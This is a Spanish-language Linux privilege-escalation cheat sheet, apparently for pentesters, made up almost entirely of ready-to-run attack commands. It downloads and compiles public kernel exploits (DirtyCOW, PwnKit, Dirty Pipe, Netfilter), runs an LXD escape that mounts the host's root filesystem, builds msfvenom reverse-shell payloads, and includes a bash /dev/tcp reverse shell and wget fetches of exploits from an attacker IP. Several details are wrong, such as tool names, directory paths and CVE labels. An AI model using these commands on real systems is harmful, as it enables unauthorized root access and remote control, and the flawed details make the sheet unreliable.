Skip to content

REFERENCIAS Y DESCARGAS - Linux Privilege Escalation

Herramientas de Enumeración

linpeas.sh

bash
wget https://github.com/carlospolop/PEASS-ng/releases/download/20240804-27c05ab0/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

LinEnum

bash
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

LSE (Linux Exploit Suggester)

bash
wget https://raw.githubusercontent.com/linted/lse/master/lse.sh
chmod +x lse.sh
./lse.sh -i all

unix-privesc-check

bash
wget http://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.6.tar.gz
tar -xzf unix-privesc-check-1.4.6.tar.gz
cd unix-privesc-check-1.4.6
./unix-privesc-check standard

pspy (Process Spying)

bash
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64
./pspy64

enum4linux

bash
sudo apt install enum4linux
enum4linux -a 192.168.1.100

Herramientas de Escalación

DirtyCOW (CVE-2016-5195)

bash
git clone https://github.com/dirtycow/dirtycow.github.io
cd dirtycow
make
./dirtyc0w /etc/passwd

PwnKit (CVE-2021-4034)

bash
git clone https://github.com/berdav/CVE-2021-4034.git
cd CVE-2021-4034
make
./cve-2021-4034

Dirty Pipe (CVE-2022-0847)

bash
git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
cd CVE-2022-0847-DirtyPipe-Exploits
gcc -o exploit exploit.c
./exploit

eBPF Exploit (CVE-2021-3439)

bash
gcc -O2 -target bpf -c exploit.c -o exploit.o

CVE-2021-22555 (Netfilter)

bash
searchsploit CVE-2021-22555
searchsploit -m linux/kernel_exploits/51996.c
gcc -o exploit 51996.c
./exploit

CVE-2022-34918 (Netfilter)

  • GitHub: Buscar en kernel-exploits
  • Searchsploit: searchsploit CVE-2022-34918
bash
searchsploit CVE-2022-34918

Meltdown / Spectre

bash
git clone https://github.com/IAIK/meltdown
cd meltdown

LXD/LXC Privilege Escalation

bash
wget https://github.com/saghul/lxd-alpine-builder/releases/download/v0.3/alpine-v3.13-x86_64-20210218_0139.tar.gz
lxc image import alpine-*.tar.gz --alias alpine
lxc init alpine container -c security.privileged=true
lxc config device add container root disk source=/ path=/host
lxc start container
lxc exec container -- /bin/bash

Herramientas de Post-Explotación

Mimikatz (para Windows ejecutándose en Linux)

hashcat (Crackeo de contraseñas)

bash
sudo apt install hashcat
hashcat -m 1800 -a 0 hashes.txt rockyou.txt

john (John the Ripper)

bash
sudo apt install john
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

GTFOBins para Linux


Herramientas de Transferencia

nc.exe / nc (Netcat)

bash
sudo apt install netcat
nc -lvp 4444

wget / curl

  • Preinstalados en Linux
bash
wget http://192.168.1.100/exploit
curl -O http://192.168.1.100/exploit

scp

  • SSH Copy
bash
scp usuario@objetivo:/tmp/archivo .
scp archivo usuario@objetivo:/tmp/

Python HTTP Server

  • Incluido en Python
bash
python3 -m http.server 8000
wget http://kali:8000/archivo

Herramientas de Análisis

Searchsploit

bash
searchsploit "Linux Kernel" 5.10
searchsploit -m 50123
searchsploit --update

Exploitation Framework - Metasploit

bash
msfconsole
use exploit/linux/...

ExploitDB


Herramientas de Scripting

msfvenom (Generador de Payloads)

  • Incluido en: Metasploit Framework
  • Preinstalado en Kali
bash
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o shell.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o shell.elf

pwntools

bash
pip3 install pwntools
python3 script.py

Reverse Shell Generator

bash
# Generar shells inversos online
bash -i >& /dev/tcp/192.168.1.100/4444 0>&1

Referencias Oficiales

LOLBINS (Living Off The Land Binaries)

GTFOBins

Kernel Exploit Database

Priv2Admin

PayloadsAllTheThings


Instalación Rápida en Kali

bash
# Actualizar
sudo apt update && sudo apt upgrade -y

# Herramientas de pentesting
sudo apt install -y git wget curl netcat nmap metasploit-framework
sudo apt install -y python3-pip python3-dev
sudo apt install -y gcc g++ make binutils gdb

# Tools específicas
sudo apt install -y enum4linux john hashcat
sudo apt install -y wget curl openssh-client

# Python packages
pip3 install pwntools pycryptodome impacket

# Clonar repos importantes
git clone https://github.com/carlospolop/PEASS-ng.git
git clone https://github.com/PowerShellMafia/PowerSploit.git
git clone https://github.com/v1s1t0r1sh3r3/kernel_exploits.git
git clone https://github.com/SecWiki/linux-kernel-exploits.git

# Descargar herramientas
chmod +x PEASS-ng/linPEAS/linpeas.sh
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
wget https://raw.githubusercontent.com/linted/lse/master/lse.sh

Búsqueda de Exploits Específicos

Por CVE

bash
# En Kali
searchsploit CVE-2021-4034
searchsploit CVE-2022-0847
searchsploit CVE-2021-22555

# Online
https://www.exploit-db.com/search?q=CVE-2021-4034

Por Versión de Kernel

bash
uname -r
searchsploit "Linux Kernel" 5.10
searchsploit "Ubuntu" 20.04

Por Versión de SO

bash
cat /etc/os-release
lsb_release -a
searchsploit "Debian" 10
searchsploit "CentOS" 8